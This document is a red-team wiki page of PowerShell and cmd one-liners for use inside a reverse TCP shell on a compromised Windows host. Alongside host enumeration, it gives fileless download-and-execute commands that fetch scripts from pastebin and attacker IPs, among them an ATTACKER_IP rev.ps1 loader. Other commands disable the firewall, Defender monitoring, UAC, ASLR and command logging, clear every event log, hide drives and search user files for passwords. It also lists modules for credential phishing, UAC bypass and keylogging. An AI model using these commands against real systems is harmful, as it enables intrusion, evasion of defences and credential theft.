CmdLine & Scripts for reverse TCP shell addicts

Description

This WIKI describes some of the available cmdline(s) & Scripts that can be executed directly in our reverse tcp shell prompt
to help pentesters (red teams) in there enumeration tasks or to perform simple remote host shell functions (onelinners),

Wiki Jump Links

[1] - Enumeration
[2] - NetWork
[3] - FileSystem
[4] - Credentials
[5] - Auxiliary-Modules

Enumeration

Description	Privileges	Interpreter	LolBin
target host enumeration	🚶 UserLand	cmd or powershell	systeminfo

systeminfo|findstr "Host OS Type"

Description	Privileges	Interpreter
List Host Accounts	🚶 UserLand	powershell

Get-LocalUser|Select-Object Name,Enabled,Description

Description	Privileges	Interpreter
List last logon	🚶 UserLand	powershell

Get-LocalUser|ft Name,Enabled,LastLogon

Description	Privileges	Interpreter	Storage
Capture desktop screenshot and save to TMP (FileLess)	🚶 UserLand	powershell	FileLess + $Env:TMP (screenshots)

iex(iwr("https://pastebin.com/raw/L8BVTDV6"))

Description	Privileges	Interpreter	LolBin	Storage
Capture screenshots of mouseclicks for 4 seconds	🚶 UserLand	powershell	psr.exe	$Env:TMP (SHot.zip)

psr.exe /start /output $Env:TMP\SHot.zip /sc 1 /gui 0;Start-Sleep -Seconds 4;psr.exe /stop

Description	Privileges	Interpreter
List Host Schedule Tasks	🚶 UserLand	cmd or powershell

cmd /c schtasks|findstr "Ready Running"

Description	Privileges	Interpreter
List Host Process(s) Running	🚶 UserLand	powershell

Get-Process|Select-Object Name,Path,Company,Product,StartTime

Description	Privileges	Interpreter
List Host Process(s) Running	🚶 UserLand	cmd or powershell

cmd /c tasklist /SVC

Description	Privileges	Interpreter
Stop remote process(s)	🚶 UserLand	cmd or powershell

cmd /c Taskkill /F /IM Python.exe

Description	Privileges	Interpreter
List Host Applications Installed.	🚶 UserLand	powershell

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |Select-Object DisplayName, DisplayVersion|Format-Table -AutoSize

Description	Privileges	Interpreter
Anti-Virus Enumeration	🚶 UserLand	powershell

Get-MpComputerStatus

[^] - Jump to Top

NetWork

Description	Privileges	Interpreter
List established connections	🚶 UserLand	cmd or powershell

cmd /c netstat -ano|findstr "ESTABLISHED"

Description	Privileges	Interpreter
List established connections	🚶 UserLand	powershell

Get-NetTcpConnection -State "Established"|Format-Table -AutoSize

Description	Privileges	Interpreter	LolBin
Start firefox browser in sellected url	🚶 UserLand	cmd or powershell	firefox.exe

cmd /c start firefox.exe https://www.bing.com/search?q=hacking

Description	Privileges	Interpreter	LolBin
Start webserver in current directory	🚶 UserLand	cmd or powershell	python.exe

python -m http.server --bind 192.168.1.72 8080

Description	Privileges	Interpreter	Storage
Download cmdlet to target machine and exec (FileLess)	🚶 UserLand	powershell	FileLess

iex(iwr("http://192.168.1.72/webserver.ps1"))

Description	Privileges	Interpreter	Storage
Download cmdlet to target machine	🚶 UserLand	powershell	$Env:TMP

iwr -Uri http://192.168.1.72/webserver.ps1 -OutFile $env:tmp\webserver.ps1

Description	Privileges	Interpreter	LolBin	Storage
Download cmdlet to target machine and exec (FileLess)	🚶 UserLand	powershell	Msxml2.XMLHTTP	FileLess

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText

Description	Privileges	Interpreter
List target host Interfaces	🚶 UserLand	powershell

Get-NetIPConfiguration|ft InterfaceAlias,InterfaceDescription,IPv4Address

Description	Privileges	Interpreter	LolBin
Fetch HTML headers	🚶 UserLand	cmd or powershell	curl.exe

cmd /c curl --head "https://example.com"

Description	Privileges	Interpreter	LolBin
List contents of remote directory	🚶 UserLand	cmd or powershell	curl.exe

cmd /c curl --list-only "https://example.com/foo/"

Description	Privileges	Interpreter
List Host DNS Cache Entrys	🚶 UserLand	cmd or powershell

cmd /c ipconfig /displaydns|findstr /C:"Record Name" /C:"A (Host) Record"

Description	Privileges	Interpreter
List Host DNS Cache Entrys	🚶 UserLand	Wmi + powershell

Get-WmiObject -query "Select * from MSFT_DNSClientCache" -Namespace "root\standardcimv2" -ErrorAction stop|Select-Object Entry,Name,Data|Format-Table -Wrap|Out-String

Description	Privileges	Interpreter
List Host DNS Cache Entrys	🚶 UserLand	powershell

Get-DNSClientCache|Select-Object Entry,Data|Format-Table -AutoSize

Description	Privileges	Interpreter	LolBin
List firewall rules	🚶 UserLand	cmd or powershell	netsh.exe

cmd /c netsh advfirewall show allprofiles

Description	Privileges	Interpreter	LolBin
List firewall rules	🚶 UserLand	cmd or powershell	netsh.exe

cmd /c netsh advfirewall show currentprofile

Description	Privileges	Interpreter
List SMB shares	🚶 UserLand	powershell

Get-SmbShare|Select-Object Name,Path,Description

Description	Privileges	Interpreter
Get browser User Agent	🚶 UserLand	powershell

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\internet settings" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'

Description	Privileges	Interpreter	LolBin
Stop remote firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall set allprofiles state off

Description	Privileges	Interpreter	LolBin
Start remote firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall set allprofiles state on

Description	Privileges	Interpreter	LolBin
Add Rule to firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall firewall add rule name="Mine Webserver" dir=in action=allow protocol=TCP localport=8080

Description	Privileges	Interpreter	LolBin
Add Rule to firewall	🔑 Administrator	cmd or powershell	netsh.exe

netsh advfirewall firewall add rule name="Mine Webserver" description="venom v1.0.17 - python (SE) webserver" program="$Env:LOCALAPPDATA\Programs\python.exe" dir=in action=allow protocol=TCP enable=yes

Description	Privileges	Interpreter	LolBin
Delete Rule from firewall	🔑 Administrator	cmd or powershell	netsh.exe

cmd /c netsh advfirewall firewall delete rule name="Mine Webserver"

Description	Privileges	Interpreter
Delete Rule from firewall	🔑 Administrator	powershell

Remove-NetFirewallRule -DisplayName "Mine Webserver"

Description	Privileges	Interpreter	LolBin
Review firewall rule (Name)	🔑 Administrator	cmd or powershell	netsh.exe

netsh advfirewall firewall show rule name="Mine Webserver"

[^] - Jump to Top

FileSystem

Description	Privileges	Interpreter
Print Working Directory	🚶 UserLand	cmd or powershell

pwd

Description	Privileges	Interpreter
Hidde file with 'system' attribute	🚶 UserLand	cmd or powershell

cmd /c attrib +H +S C:\path\to\your\file.doc

Description	Privileges	Interpreter
Un-Hidde file with 'system' attribute	🚶 UserLand	cmd or powershell

cmd /c attrib -H -S C:\path\to\your\file.doc

Description	Privileges	Interpreter
List hidden files recursive	🚶 UserLand	cmd or powershell

cmd /c dir %USERPROFILE% /A:H /S /B

Description	Privileges	Interpreter
List ADS (Alternate Data Streams) entrys	🚶 UserLand	cmd or powershell

cmd /c dir /r

Description	Privileges	Interpreter
List all event logs	🚶 UserLand	powershell

Get-EventLog -List

Description	Privileges	Interpreter
Read FileName.txt text file on terminal (PS)	🚶 UserLand	powershell

Get-Content FileName.tx

Description	Privileges	Interpreter
Read FileName.txt text file on terminal (PS)	🚶 UserLand	cmd or powershell

cmd /c type FileName.txt

Description	Privileges	Interpreter
List startup entrys	🚶 UserLand	powershell

Get-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User

Description	Privileges	Interpreter
List last 10 system eventlogs	🚶 UserLand	powershell

Get-EventLog -LogName "System" -newest 10

Description	Privileges	Interpreter
List last 10 security eventlogs	🚶 UserLand	powershell

Get-EventLog -LogName "Security" -newest 10

Description	Privileges	Interpreter
List last 10 Powershell eventlogs	🚶 UserLand	powershell

Get-EventLog -LogName "Windows Powershell" -newest 10

Description	Privileges	Interpreter
List Installed Software	🚶 UserLand	powershell

Get-ChildItem "C:\Program Files", "C:\Program Files (x86)"|ft Parent,Name,LastWriteTime

Description	Privileges	Interpreter
Shutdown remote pc in 10 seconds	🚶 UserLand	cmd or powershell

cmd /R shutdown /r /c "my shutdown msg" /t 10

Description	Privileges	Interpreter
List Recycle Bin entrys	🚶 UserLand	powershell

$shell = New-Object -com shell.application;$rb = $shell.Namespace(10);$rb.Items()

Description	Privileges	Interpreter
List Host Drives Available	🚶 UserLand	powershell

Get-PSDrive -PSProvider 'FileSystem'|Select-Object Name,Used,Free,Root|Format-Table

Description	Privileges	Interpreter
Hidde Drives from explorer	🔑 Administrator	cmd or powershell

cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

Description	Privileges	Interpreter
Show Drives on explorer	🔑 Administrator	powershell

Remove-Itemproperty -path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\Explorer' -Name 'NoDrives' -Force;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

Description	Privileges	Interpreter
Clear windows event logs	🔑 Administrator	powershell

wevtutil el|Foreach-Object {wevtutil cl "$_"}

Description	Privileges	Interpreter
Disable remote UAC	🔑 Administrator	powershell

Set-Itemproperty -path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system' -Name 'EnableLUA' -value 0 -Force

Description	Privileges	Interpreter
Disable remote ASLR	🔑 Administrator	powershell

Set-Itemproperty -path 'HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' -Name 'MoveImages' -value 0 -Force

Description	Privileges	Interpreter
Disable Task Manager	🔑 Administrator	cmd or powershell

cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

Description	Privileges	Interpreter
Enable Task Manager	🔑 Administrator	cmd or powershell

cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 0 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe

[^] - Jump to Top

Credentials

⭕ List User Tokens 🔑 Privileges: UserLand

whoami /priv

⭕ List Host Groups Available (SID) 🔑 Privileges: UserLand

Get-LocalUser|Select-Object -Property Name,SID,Enabled,PasswordRequired,LastLogon|ft

⭕ List Host Folder Permissions 🔑 Privileges: UserLand

Get-Acl $Env:PROGRAMFILES

⭕ List Host Folder Permissions 🔑 Privileges: UserLand

icacls "$Env:PROGRAMFILES"

⭕ List folders with 'Everyone' Permissions 🔑 Privileges: UserLand

Get-ChildItem "C:\Program Files*", "C:\Program Files (x86)*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}}

⭕ List Host Unquoted Service Paths. 🔑 Privileges: UserLand

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode|Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows\*" -and $_.PathName -notlike '"*"'} | Select PathName,DisplayName,Name

⭕ List Folder(s) Weak Permissions Recursive. 🔑 Privileges: UserLand

icacls $env:programfiles\* > $env:tmp\WeakDirs.txt;$check_ACL = get-content $env:tmp\WeakDirs.txt|findstr /I /C:"Everyone:"|findstr "(F) (R) (W)";If($check_ACL){Get-Content $env:tmp\WeakDirs.txt;remove-item $env:tmp\WeakDirs.txt -Force}

⭕ Search for Rotten Potato Vulnerability. 🔑 Privileges: UserLand

cmd /R whoami /priv|findstr /i /C:"SeImpersonatePrivilege" /C:"SeAssignPrimaryPrivilege" /C:"SeTcbPrivilege" /C:"SeBackupPrivilege" /C:"SeRestorePrivilege" /C:"SeCreateTokenPrivilege" /C:"SeLoadDriverPrivilege" /C:"SeTakeOwnershipPrivilege" /C:"SeDebugPrivileges" > dellog.txt;$check_ACL = get-content dellog.txt|findstr /i /C:"Enabled";If($check_ACL){echo "[i] Rotten Potato Vulnerable Settings Found [Enabled] ..`n" > test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Get-Content dellog.txt;remove-item dellog.txt -Force}Else{echo "[i] Rotten Potato not found in current system .."}

⭕ Check reverse tcp shell privileges 🔑 Privileges: UserLand

$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");If($IsClientAdmin){echo "[i] Running under Administrator Privileges .."}Else{write-host "[i] Running under UserLand Privileges .."}

⭕ Disable AV Real time Monitoring 🔑 Privileges: UserLand

Set-MpPreference -DisableRealtimeMonitoring $True

⭕ Disable PowerShell command logging 🔑 Privileges: UserLand

Set-PSReadlineOption –HistorySaveStyle SaveNothing

⭕ Search for paswords inside text (txt) or log (log) files recursive 🔑 Privileges: UserLand

cd $Env:USERPROFILE|findstr /s /I "passw" *.txt *.log >> $Env:TMP\passwd.txt;cd $Env:USERPROFILE|findstr /s /I "login" *.txt *.log >> $Env:TMP\passwd.txt;Get-Content $Env:TMP\passwd.txt;Remove-Item $Env:TMP\passwd.txt -Force

⭕ Powershell Constrained Language Bypass 🔑 Privileges: UserLand

powershell -v 2 -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"

⭕ Change execution policy for this session 🔑 Privileges: UserLand

Set-ExecutionPolicy Bypass -Scope Process

[^] - Jump to Top

Auxiliary-Modules

Module	Description
GetBrowsers.ps1	Enumerate remote host browsers (Home Page, All Browsers Versions, Accepted Language Download Directory, History, Bookmarks, Extentions, Start Page, Stored Creds, User-Agent, logins stored.)
CredsPhish.ps1	Standalone Powershell script that will promp the current user for a valid credential.
CompDefault.ps1	UAC bypass module or to execute one command with high privileges (Admin)
keylooger.ps1	Standalone Powershell Script to Capture keyboard keystrokes
webserver.ps1	CmdLet to download files from compromissed PC

[^] - Jump to Top

SSA RedTeam @2020